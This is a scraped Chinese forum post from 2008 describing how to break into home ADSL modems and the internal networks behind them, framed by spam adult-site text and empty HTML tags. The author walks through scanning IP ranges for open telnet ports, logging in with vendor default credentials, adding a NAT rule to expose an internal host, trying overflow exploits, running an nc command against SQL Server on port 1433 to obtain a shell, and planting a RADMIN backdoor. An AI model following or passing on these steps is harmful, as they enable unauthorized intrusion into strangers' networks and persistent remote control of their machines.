成 人 网 站国产免费观看

<p id="lkccd"></p>

    <td id="lkccd"></td>
    <acronym id="lkccd"></acronym>
    <table id="lkccd"><ruby id="lkccd"></ruby></table>
    <td id="lkccd"></td>
    <p id="lkccd"><strong id="lkccd"></strong></p>

    dvbbs
    聯系我 收藏本頁
    聯系我們
    論壇幫助
    dvbbs

    深圳印刷論壇世界網絡-網絡技術網絡技術 → 黑客如何穿透ADSL路由入侵內網


      共有11890人關注過本帖樹形打印

    主題:黑客如何穿透ADSL路由入侵內網

    帥哥喲,離線,有人找我嗎?
    止談風月
      1樓 個性首頁 | QQ | 信息 | 搜索 | 郵箱 | 主頁 | UC


    加好友 發短信 止談風月
    等級:管理員 貼子:1542 積分:16633 威望:5 精華:0 注冊:2007-3-17 22:33:59
    黑客如何穿透ADSL路由入侵內網  發貼心情 Post By:2008-12-20 0:03:50

    也許看爛了網上已有的常規黑客攻擊手段,對一些陳舊的入侵手法早已厭煩,近來我對ADSL MODEM的路由功能產生了濃厚的興趣,經過一番努力,我終于找到了穿透ADSL路由入侵內網的方法,在這里和各位一起分享我的心得。

    一.掃描

    現在很多ADSLMODEM都是通過80、23、21三個端口來管理,但80、21端口有很多服務器都有打開,沒什么特征性,于是我選擇了23端口。打開我的至愛:SUPPERSCAN,填上我所在地區的IP段,(跨多幾段都沒關系,反正SUPPERSCAN的速度就是快)眨眼間,結果出來了。開23的主機還真不少,我挑了幾臺出來,在瀏覽器那里輸入IP:218.xxx.xxx.xxx,OK。登陸對話框出來了,輸入USER:ADSLpass:adsl1234(因為我這里的adsl modem一般是華碩的,缺省是adsl adsl1234),好了,一矢中的,現在我就是上帝。

    二.映射

    入侵已經成功了一半,要進一步入侵內網,我門要進行端口映射,但是我連內網的拓撲都不知道(更不用說內網主機的端口開放情況了)又怎么映射呢?在此,我選擇了猜測。一般來說,MODEM的內網IP缺省是192.168.1.1,其他的IP都是192.168.1.X,看DHCP分配表和流量統計可以知道內網的什么IP在用。但是192.168.1.2到底開放了什么端口,我們根本就不知道啊。呵呵,既然不知道,那么我就把他整臺主機透明地映射到外網。具體做法如下:進入NAT選項---添加NAT規則---BAMID---填入主機IP:192.168.1.X,到此192.168.1.X已經透明地映射到192.168.1.1上,我們訪問ADSL MODEM就等于訪問主機192.168.1.X了。

    三.檢測漏洞

    現在我們再請出SUPPERSCAN對218.xxx.xxx.xxx進行掃描,呵,看到沒有?掃描結果已經不同了,開放的端口是139、1433等,剛才只是開放了80、23、21而已(也就是說我們的映射已經成功了)該是X-SCAN出手了,用它來掃弱口令最好不過了,但掃描的結果令人失望,一個弱口令也沒有,看來管理員還不算低啊。

    四.溢出

    既然沒有弱口令,也沒開80,那只好從逸出方面著手了,但沒開80、21也就webdav .sevr-u的溢出沒戲了,很自然,我向導了RPC溢出,但實踐證明RPC溢出也是不行的,LSASS溢出也不行

    五.募然回首,那人卻在,燈火闌珊處

    看來這個管理員還是比較負責的,該打的補丁都打上了。這時侯,我的目光轉移到1433上了(嘿,不知道他打了SQL補丁沒有?,心動不如行動,現在只好死馬當活馬醫了,于是:




    nc -v -l 99 sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99


    這樣就成功得到一個shell了。

    六.設置后門

    到這里,我們的入侵已經成功了,余下的是掃尾留后門,至于后門,我一般都是用FTP上傳RADMIN上去的,呵呵,這里不詳談了,相信各位都知道。


    ▓止談風月(www.zonaiam.com)

    我們的口號:沒有最高質量的產品我們無法生存

                      沒有非常的創意我們不如不干
    支持(0中立(0反對(0單帖管理 | 引用 | 回復 回到頂部

    返回版面帖子列表

    黑客如何穿透ADSL路由入侵內網








    簽名  

    本站聯系電話:0755-25925567
    成 人 网 站国产免费观看

    <p id="lkccd"></p>

      <td id="lkccd"></td>
      <acronym id="lkccd"></acronym>
      <table id="lkccd"><ruby id="lkccd"></ruby></table>
      <td id="lkccd"></td>
      <p id="lkccd"><strong id="lkccd"></strong></p>